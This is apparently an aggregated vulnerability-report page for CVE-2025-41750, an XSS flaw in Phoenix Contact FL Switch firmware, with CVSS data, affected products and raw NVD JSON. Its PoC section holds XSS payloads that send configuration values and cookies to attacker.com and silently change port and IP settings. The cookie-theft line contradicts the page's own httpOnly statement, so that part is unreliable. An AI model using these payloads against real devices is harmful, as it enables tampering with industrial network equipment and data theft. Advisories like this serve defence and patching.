Security Vulnerability Report
中文
CVE-2025-41750 CVSS 7.1 HIGH

CVE-2025-41750

Published: 2025-12-09 16:17:50
Last Modified: 2025-12-19 16:45:56
Source: [email protected]

Description

An XSS vulnerability in pxc_PortCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2105_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2105:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2108_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2108:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2116_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2116:-:*:*:*:*:*:*:* - NOT VULNERABLE
Perception Xtension Controller (所有使用pxc_PortCfg.php的版本)
具体版本信息需参考厂商官方公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-41750 XSS PoC --> <!-- 恶意链接构造示例 --> <!-- 基本XSS Payload --> <a href="http://target-host/pxc_PortCfg.php?param=<script>alert('XSS')</script>">Click me</a> <!-- 窃取配置参数的XSS Payload --> <script> // 获取页面中的配置参数 var configs = document.querySelectorAll('input[name*="cfg"]'); var stolenData = []; configs.forEach(function(input) { stolenData.push(input.value); }); // 发送到攻击者控制的服务器 var exfil = new Image(); exfil.src = "http://attacker.com/log?data=" + btoa(JSON.stringify(stolenData)); </script> <!-- 修改配置参数的XSS Payload --> <script> // 遍历所有可编辑的输入框 var inputs = document.querySelectorAll('input[type="text"], select'); inputs.forEach(function(input) { // 检查是否为关键配置参数 if (input.name.includes('port') || input.name.includes('ip')) { // 修改为攻击者指定的值 input.value = 'malicious_value'; } }); // 自动提交表单 var form = document.querySelector('form'); if (form) { form.submit(); } </script> <!-- 完整的社会工程攻击链接 --> <!-- 建议管理员点击此链接查看'重要安全更新' --> <a href="http://target-host/pxc_PortCfg.php?port=<img src=x onerror='fetch("http://attacker.com/steal?cookie="+document.cookie)'>">View Important Security Update</a>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41750", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:50.433", "lastModified": "2025-12-19T16:45:56.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XSS vulnerability in pxc_PortCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "DBFA9AC1-51A3-4516-81E9-8044EFB9E436"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D3F1820-AF71-4D9A-BC63-1B886C739FD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E2224C43-207D-4E66-96CE-7994EA2F0C6B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C4DFBF9-2A05-4888-B457-E29617B74C95"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2105_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "4E7EF0AD-28B3-4085-B631-EDD603BCAC37"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2105:-:*:*:*:*:*:*:*", "matchCriteriaId": "B7A15734-B479-4E6F-923A-F838BDA51907"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2108_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "946C2D9E-B9AD-4F30-9486-9CF46A1678D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2108:-:*:*:*:*:*:*:*", "matchCriteriaId": "D02E0265-C083-4434-A8A5-F886D8877CA6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2116_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "22BB4729-7E6A-4D5B-A92C-E560482A6A6C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2116:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF61AD7B-F835-421B-BA94-375A3C5F5A22"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2204-2tc-2sfx_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "AE050F85-6AF2-4C75-BD8E-E1FA94327C35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2204-2tc-2sfx:-:*:*:*:*:*:*:*", "matchCriteriaId": "360C4F7D-B4E8-4D7F-BFF5-AB7490AAD7F7"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2205_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "172C2878-FE3F-4CFE-8E22-BF20494DD9C7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2205:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B451A6F-C3D6-428B-B465-DED2FE4BFD3A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.